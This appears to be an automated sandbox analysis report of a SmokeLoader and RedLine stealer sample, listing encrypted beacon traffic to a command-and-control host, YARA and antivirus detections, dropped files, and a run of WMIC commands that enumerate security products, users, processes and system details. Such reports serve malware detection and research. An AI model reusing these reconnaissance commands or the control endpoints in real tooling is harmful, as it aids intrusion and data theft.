                                                                                                                          2024-10-08 16:26:17 UTC109OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                          2024-10-08 16:26:17 UTC285INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:17 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 7
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          2024-10-08 16:26:17 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.66146723.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:26:37 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://vevyfytohbagkutf.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 109
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:26:37 UTC109OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                          2024-10-08 16:26:37 UTC285INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:37 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 7
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          2024-10-08 16:26:37 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.66147023.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:26:56 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://slehgyiiuvhyal.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 109
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:26:56 UTC109OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                          2024-10-08 16:26:56 UTC285INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:56 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 7
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          2024-10-08 16:26:56 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                          Data Ascii:


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:12:22:56
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\O4zPA1oI9Y.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\O4zPA1oI9Y.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:223'744 bytes
                                                                                                                          MD5 hash:2942CB9FCA04E939AF4ED1EEF717E123
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:12:23:05
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:12:23:24
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\jvgasii
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\jvgasii
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:223'744 bytes
                                                                                                                          MD5 hash:2942CB9FCA04E939AF4ED1EEF717E123
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 79%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:12:23:53
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\DE97.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\DE97.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:229'376 bytes
                                                                                                                          MD5 hash:1096F19319B5C475C2A12B8D0CC4022D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:12:24:18
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\uegasii
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\uegasii
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:229'376 bytes
                                                                                                                          MD5 hash:1096F19319B5C475C2A12B8D0CC4022D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:12:24:36
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\8CAE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\8CAE.exe
                                                                                                                          Imagebase:0x7ff7cbca0000
                                                                                                                          File size:78'336 bytes
                                                                                                                          MD5 hash:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 42%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:12:24:37
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                          Imagebase:0x7ff6c8440000
                                                                                                                          File size:69'632 bytes
                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:12:24:39
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Imagebase:0x5d0000
                                                                                                                          File size:4'514'184 bytes
                                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:12:24:40
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:12:24:41
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Imagebase:0x5d0000
                                                                                                                          File size:4'514'184 bytes
                                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:12:24:42
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:12:24:43
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Imagebase:0x5d0000
                                                                                                                          File size:4'514'184 bytes
                                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:12:24:44
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:12:24:55
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:cmd
                                                                                                                          Imagebase:0x7ff7fc380000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:12:24:55
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:12:24:56
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:12:24:58
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:12:25:01
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:12:25:03
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:26
                                                                                                                          Start time:12:25:05
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:27
                                                                                                                          Start time:12:25:08
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:28
                                                                                                                          Start time:12:25:10
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:29
                                                                                                                          Start time:12:25:13
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:30
                                                                                                                          Start time:12:25:16
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:31
                                                                                                                          Start time:12:25:25
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:32
                                                                                                                          Start time:12:25:29
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:33
                                                                                                                          Start time:12:25:35
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:34
                                                                                                                          Start time:12:25:51
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
